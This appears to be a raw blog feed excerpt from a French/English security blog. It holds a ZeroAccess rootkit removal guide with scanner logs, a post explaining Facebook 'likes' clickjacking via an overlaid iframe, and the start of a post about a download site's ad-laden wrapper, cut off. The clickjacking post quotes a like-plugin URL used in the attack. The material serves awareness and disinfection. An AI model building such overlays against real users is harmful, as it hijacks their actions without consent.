&lt;embed width="600" height="375"  src="http://www.youtube.com/v/GW-z6F0LGeM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
Voici les rapports obtenus avec RogueKiller et Malwarebytes:&lt;br /&gt;
Here's the reports obtained with both RogueKiller and Malwarebytes:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;h3&gt;
&lt;i&gt;&lt;b&gt;Télécharger / Download :&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style="color: #38761d;"&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;span style="background-color: white;"&gt;&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;a href="http://fr.malwarebytes.org/" target="_blank"&gt;Malwarebytes&lt;/a&gt;&lt;/span&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;a href="http://www.sur-la-toile.com/RogueKiller/" target="_blank"&gt;RogueKiller&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;
 &lt;div align="align" middle="middle" style="display: inline-block;"&gt;
&lt;div align="center" style="float: left;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
   google_ad_client = "ca-pub-1402516409062885";
   /* Blog content */
   google_ad_slot = "2223477569";
   google_ad_width = 336;
   google_ad_height = 280;
   //&lt;/script&gt;
   &lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
   &lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;/center&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;¤¤¤ Entrees de registre: 2 ¤¤¤&lt;br /&gt;&lt;b&gt;[ZeroAccess] HKCR\[...]\InprocServer32 :&amp;nbsp; (\\.\globalroot\systemroot\Installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n.) -&amp;gt; REPLACED (c:\windows\system32\wbem\wbemess.dll)&lt;/b&gt;&lt;br /&gt;[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -&amp;gt; REPLACED (0)&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;br /&gt;&lt;b&gt;[ZeroAccess][FILE] n : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n --&amp;gt; REMOVED&lt;br /&gt;[ZeroAccess][FILE] @ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\@ --&amp;gt; REMOVED AT REBOOT&lt;br /&gt;[Del.Parent][FILE] 00000001.@ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U\00000001.@ --&amp;gt; REMOVED&lt;br /&gt;[Del.Parent][FILE] 80000000.@ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U\80000000.@ --&amp;gt; REMOVED&lt;br /&gt;[Del.Parent][FILE] 800000cb.@ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U\800000cb.@ --&amp;gt; REMOVED&lt;br /&gt;[ZeroAccess][FOLDER] U : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U --&amp;gt; REMOVED&lt;br /&gt;[ZeroAccess][FILE] n : c:\documents and settings\tigzy\local settings\application data\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n --&amp;gt; REMOVED&lt;br /&gt;[ZeroAccess][FILE] @ : c:\documents and settings\tigzy\local settings\application data\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\@ --&amp;gt; REMOVED&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;¤¤¤ Driver: [CHARGE] ¤¤¤&lt;br /&gt;SSDT[98] : NtLoadKey @ 0x8061C482 -&amp;gt; HOOKED (Unknown @ 0xF8CD30E2)&lt;br /&gt;SSDT[122] : NtOpenProcess @ 0x805C1296 -&amp;gt; HOOKED (Unknown @ 0xF8CD30B0)&lt;br /&gt;SSDT[128] : NtOpenThread @ 0x805C1522 -&amp;gt; HOOKED (Unknown @ 0xF8CD30B5)&lt;br /&gt;SSDT[193] : NtReplaceKey @ 0x8061C332 -&amp;gt; HOOKED (Unknown @ 0xF8CD30EC)&lt;br /&gt;SSDT[204] : NtRestoreKey @ 0x8061BC3E -&amp;gt; HOOKED (Unknown @ 0xF8CD30E7)&lt;br /&gt;&lt;br /&gt;¤¤¤ Infection : ZeroAccess ¤¤¤&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: x-small;"&gt;[...] &lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Type d'examen: Examen complet&lt;br /&gt;Options d'examen activées: Mémoire | Démarrage | Registre | Système de fichiers | Heuristique/Extra | Heuristique/Shuriken | PUP | PUM&lt;br /&gt;Options d'examen désactivées: P2P&lt;br /&gt;Elément(s) analysé(s): 189868&lt;br /&gt;Temps écoulé: 7 minute(s), 1 seconde(s)&lt;br /&gt;&lt;br /&gt;Processus mémoire détecté(s): 0&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Module(s) mémoire détecté(s): 0&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Clé(s) du Registre détectée(s): 1&lt;br /&gt;&lt;b&gt;HKCU\SOFTWARE\CLASSES\CLSID\{42AEDC87-2188-41FD-B9A3-0C966FEABEC1}\INPROCSERVER32 (Trojan.Zaccess) -&amp;gt; Mis en quarantaine et supprimé avec succès.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Valeur(s) du Registre détectée(s): 1&lt;br /&gt;&lt;b&gt;HKCU\SOFTWARE\CLASSES\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32| (Trojan.Zaccess) -&amp;gt; Données: C:\Documents and Settings\tigzy\Local Settings\Application Data\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n. -&amp;gt; Mis en quarantaine et supprimé avec succès.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Elément(s) de données du Registre détecté(s): 0&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Dossier(s) détecté(s): 0&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Fichier(s) détecté(s): 5&lt;br /&gt;&lt;b&gt;C:\Documents and Settings\tigzy\Bureau\LogicielsDesinfection\HideProc(v1.0)\HideProcDrv.sys (Rootkit.Agent) -&amp;gt; Aucune action effectuée.&lt;br /&gt;C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\00000001.@.vir (Trojan.Small) -&amp;gt; Mis en quarantaine et supprimé avec succès.&lt;br /&gt;C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\80000000.@.vir (Trojan.Sirefef) -&amp;gt; Mis en quarantaine et supprimé avec succès.&lt;br /&gt;C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\800000cb.@.vir (Rootkit.0Access) -&amp;gt; Mis en quarantaine et supprimé avec succès.&lt;br /&gt;C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\n.vir (Trojan.Dropper.PE4) -&amp;gt; Mis en quarantaine et supprimé avec succès.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;(fin) &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="background-color: #0b5394; color: black;"&gt;____________________________________&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Variante précédente - Previous variant&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/IAzvk3zf2PQ/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/IAzvk3zf2PQ?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;







&lt;param name="bgcolor" value="#FFFFFF" /&gt;







&lt;embed width="600" height="375"  src="http://www.youtube.com/v/IAzvk3zf2PQ?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Ce rootkit parvient à désactiver l'antivirus, et à s'installer dans la couche tcp/ip, provoquant des redirections de la navigation. Il tue et modifie également les ACLs des programmes qui tentent de le scanner. Ce rootkit se compose de 3 parties:&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;Une dll (conserv.dll) pour les systèmes x64&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Un système de fichiers verrouillé (C:/Windows/$NtUninstallKBxxxxx$) ou il stocke ses fichiers, ainsi il est sûr qu'il ne seront pas supprimés&lt;/li&gt;
&lt;li&gt;Un driver patché (x86), choisi de manière pseudo aléatoire. Ce driver est à la base légitime.&lt;/li&gt;
&lt;/ol&gt;
&amp;nbsp; &lt;br /&gt;
&lt;ol&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;(English) This rootkit removes AVs protections, et installs itself inside the tcp/ip stack, which leads to web redirections. It kills and modify ACLs on every programms trying to scan its files. It's composed of 3 parts:&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;A dll (consrv.dll) for x64 systems&amp;nbsp;&lt;/li&gt;
&lt;li&gt;A locked filesystem (C:/Windows/$NtUninstallKBxxxxx$) where it keeps its files,being sure they won't be removed.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;A patched driver (x86), randomly chosen. This driver is legit at the origin.&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://support.kaspersky.com/downloads/utils/tdsskiller.zip"&gt;TDSSKiller&lt;/a&gt;. Bien selectionner "cure" et "delete" sur tous les objets. -- Donwload and launch &lt;a href="http://support.kaspersky.com/downloads/utils/tdsskiller.zip"&gt;TDSSKiller&lt;/a&gt;. Be careful to choose "cure" and "delete" on every object.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report &lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;19:35:47.0004 1156&amp;nbsp;&amp;nbsp; &amp;nbsp;============================================================&lt;br /&gt;
19:35:47.0309 1156&amp;nbsp;&amp;nbsp; &amp;nbsp;Initialize success&lt;br /&gt;
19:35:55.0922 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;============================================================&lt;br /&gt;
19:35:55.0922 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;Scan started&lt;br /&gt;
19:35:55.0922 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;Mode: Manual; SigCheck; TDLFS; &lt;br /&gt;
19:35:55.0922 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;============================================================&lt;br /&gt;
19:35:56.0019 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;a04dba87&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; (8f2bb1827cac01aee6a16e30a1260199) C:\WINDOWS\2277133728:1605518712.exe&lt;br /&gt;
19:35:56.0046 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;Suspicious file (Hidden): C:\WINDOWS\2277133728:1605518712.exe. md5: 8f2bb1827cac01aee6a16e30a1260199&lt;br /&gt;
19:35:56.0046 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;a04dba87 ( HiddenFile.Multi.Generic ) - warning&lt;br /&gt;
19:35:56.0046 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;a04dba87 - detected HiddenFile.Multi.Generic (1)&lt;br /&gt;
...19:36:21.0921 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;============================================================&lt;br /&gt;
19:36:21.0921 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;Scan finished&lt;br /&gt;
19:36:21.0921 1516&amp;nbsp;&amp;nbsp; &amp;nbsp;============================================================&lt;br /&gt;
19:36:22.0020 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;Detected object count: 3&lt;br /&gt;
19:36:22.0020 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;Actual detected object count: 3&lt;br /&gt;
19:37:04.0646 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;HKLM\SYSTEM\ControlSet001\services\a04dba87 - will be deleted on reboot&lt;br /&gt;
19:37:04.0656 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;C:\WINDOWS\2277133728:1605518712.exe - will be deleted on reboot&lt;br /&gt;
19:37:04.0656 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;a04dba87 ( HiddenFile.Multi.Generic ) - User select action: Delete &lt;br /&gt;
19:37:04.0656 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;procguard ( UnsignedFile.Multi.Generic ) - skipped by user&lt;br /&gt;
19:37:04.0656 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;procguard ( UnsignedFile.Multi.Generic ) - User select action: Skip &lt;br /&gt;
19:37:04.0712 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;Backup copy found, using it..&lt;br /&gt;
19:37:04.0740 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\DRIVERS\tmtdi.sys - will be cured on reboot&lt;br /&gt;
19:37:04.0740 1420&amp;nbsp;&amp;nbsp; &amp;nbsp;tmtdi ( Rootkit.Win32.ZAccess.g ) - User select action: Cure &lt;br /&gt;
19:37:07.0963 1084&amp;nbsp;&amp;nbsp; &amp;nbsp;Deinitialize success&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://download.bleepingcomputer.com/sUBs/ComboFix.exe"&gt;Combofix.&lt;/a&gt; Cela peut être long -- Then run &lt;a href="http://download.bleepingcomputer.com/sUBs/ComboFix.exe"&gt;Combofix.&lt;/a&gt; It could take a long time.&lt;/li&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report &lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt; ((((((((((((((((((((((((((((((((((((&amp;nbsp;&amp;nbsp; Autres suppressions&amp;nbsp;&amp;nbsp; ))))))))))))))))))))))))))))))))))))))))))))))))&lt;br /&gt;
.&lt;br /&gt;
.&lt;br /&gt;
&lt;b&gt;c:\windows\$NtUninstallKB58677$&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\@&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\L\echiudpr&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@00000001&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@000000c0&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@000000cb&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@000000cf&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@80000000&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@800000c0&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@800000cb&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\2689448583\U\@800000cf&lt;br /&gt;
c:\windows\$NtUninstallKB58677$\339281305&lt;/b&gt;&lt;br /&gt;
c:\windows\{2521BB91-29B1-4d7e-9137-AC9875D77735}&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Le rootkit devrait être supprimé -- The rootkit must have been deleted &lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/o5c_aR1fIIM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/7870980838609897557/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html#comment-form" title="70 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7870980838609897557?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7870980838609897557?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/o5c_aR1fIIM/rootkit-zeroaccess-max.html" title="[Rootkit] ZeroAccess (Max++)" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><thr:total>70</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUIASXo7eyp7ImA9WhVaEEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-5533265940322569509</id><published>2012-06-07T09:45:00.006-07:00</published><updated>2012-06-07T09:45:48.403-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-06-07T09:45:48.403-07:00</app:edited><title>[Info] Facebook : Détournement de likes</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;Facebook:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;Détournement de "Likes"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;(Likes-Hijack) &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-sA3JSvLS3dw/TuzIqzTB4dI/AAAAAAAAAFQ/XpUQgNVYMeA/s1600/Sans+titre+1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s1600/XPSecurity2011.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;b&gt;Un petit billet rapide après avoir vu que beaucoup de mes contacts FB se retrouvaient à aimer tous les mêmes vidéos sans intérêts, et surtout provenant de sites "non officiels", à savoir pas sur Youtube, Dailymotion ou autre.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La technique est ultra simple : En arrière plan, la vidéo (player embarqué basique), avec le fameux bouton "Play". &lt;b&gt;Au premier plan, on rajoute un div contenant l'iframe "Like" de Facebook&lt;/b&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-9hVbYQIPL3M/T9DZbwNn2xI/AAAAAAAAAGc/2eJHaP8evOg/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="290" src="http://4.bp.blogspot.com/-9hVbYQIPL3M/T9DZbwNn2xI/AAAAAAAAAGc/2eJHaP8evOg/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Le carré bleu représente la &lt;b&gt;zone de clic de l'iframe&lt;/b&gt;. On remarque que le bouton play est compris dedans. Ainsi, lorsqu'on clique sur ce dernier, on déclenche l'iframe qui va "liker" la page sur votre mur sans votre consentement: &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="nodeLabelBox repTarget " role="treeitem"&gt;&lt;span class="nodeAttr editGroup "&gt;&lt;span class="nodeName editable "&gt;src&lt;/span&gt;="&lt;span class="nodeValue editable "&gt;&lt;span style="background-color: #0b5394;"&gt;http://www.facebook.com/plugins/like.confirm.php&lt;/span&gt;?&lt;span style="background-color: #38761d;"&gt;href=http://www.fuckinghijackerwebsite.net/somepage.html&lt;/span&gt;&amp;amp;layout=button_count&amp;amp;show_faces=false&amp;amp;width=30&lt;span style="background-color: #cc0000;"&gt;&amp;amp;action=like&lt;/span&gt;&amp;amp;colorscheme=light&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #0b5394; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span class="nodeLabelBox repTarget " role="treeitem"&gt;&lt;span class="nodeAttr editGroup "&gt;La prochaine fois que vous voyez ce genre de vidéos virales sur votre mur, faites attention aux titres aguicheurs ;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="nodeLabelBox repTarget " role="treeitem"&gt;&lt;span class="nodeAttr editGroup "&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="nodeLabelBox repTarget " role="treeitem"&gt;&lt;span class="nodeAttr editGroup "&gt; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/6R4YwO4oG7s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/5533265940322569509/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/06/info-facebook-detournement-de-likes.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5533265940322569509?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5533265940322569509?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/6R4YwO4oG7s/info-facebook-detournement-de-likes.html" title="[Info] Facebook : Détournement de likes" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-9hVbYQIPL3M/T9DZbwNn2xI/AAAAAAAAAGc/2eJHaP8evOg/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/06/info-facebook-detournement-de-likes.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEGQHs4fip7ImA9WhVbGE4.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-4267190718762917811</id><published>2012-06-04T11:01:00.004-07:00</published><updated>2012-06-04T11:13:41.536-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-06-04T11:13:41.536-07:00</app:edited><title>[Info] 01net : Comment monétiser sur le dos des développeurs.</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;01NET&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;Comment monétiser &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;sur le dos des développeurs.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-Yjxo6V8U-0w/T8z0ylx2hAI/AAAAAAAAAFw/-WHZSmKteb8/s1600/Capture5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="478" src="http://2.bp.blogspot.com/-Yjxo6V8U-0w/T8z0ylx2hAI/AAAAAAAAAFw/-WHZSmKteb8/s640/Capture5.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-sA3JSvLS3dw/TuzIqzTB4dI/AAAAAAAAAFQ/XpUQgNVYMeA/s1600/Sans+titre+1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s1600/XPSecurity2011.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;b&gt;Un petit billet "coup de gueule" pour dénoncer ce que j’appelle du grand n'importe quoi.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Aujourd'hui on me rapporte un problème avec &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; sur le site de 01net.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Jusqu'à présent, ces derniers avaient toujours mis le lien direct vers le binaire du site officiel. Bien que cela me dérange de ne pas passer par la page en elle-même, j'avais toléré.&lt;br /&gt;
&lt;br /&gt;
Aujourd'hui, je découvre en lieu et place du lien direct un lien vers un &lt;b&gt;downloader&lt;/b&gt; qui va proposer tout &lt;b&gt;un tas de grosses merdouilles&lt;/b&gt; (j'ai l'habitude), mais tenez vous bien, &lt;b&gt;en prime de la publicité vidéo!&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Et pas qu'un peu! Avec un semblant de barre de téléchargement (le binaire officiel fait 1Mo et quelques...) qui est rapide au début, &lt;b&gt;arrivé vers les 99% la barre se stoppe net de façon à permettre de monétiser&lt;/b&gt; à balle le téléchargement (une vidéo vue pendant 3 secondes est moins rentable qu'une visionnée 30 secondes...)&lt;br /&gt;
&lt;br /&gt;
Là où c'est vicieux, c'est que le fait de bloquer à 99% va faire croire à l'utilisateur que c'est bientôt fini! Que nenni, c'est le programme qui décide quand c'est fini.&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;Petite analyse à chaud:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
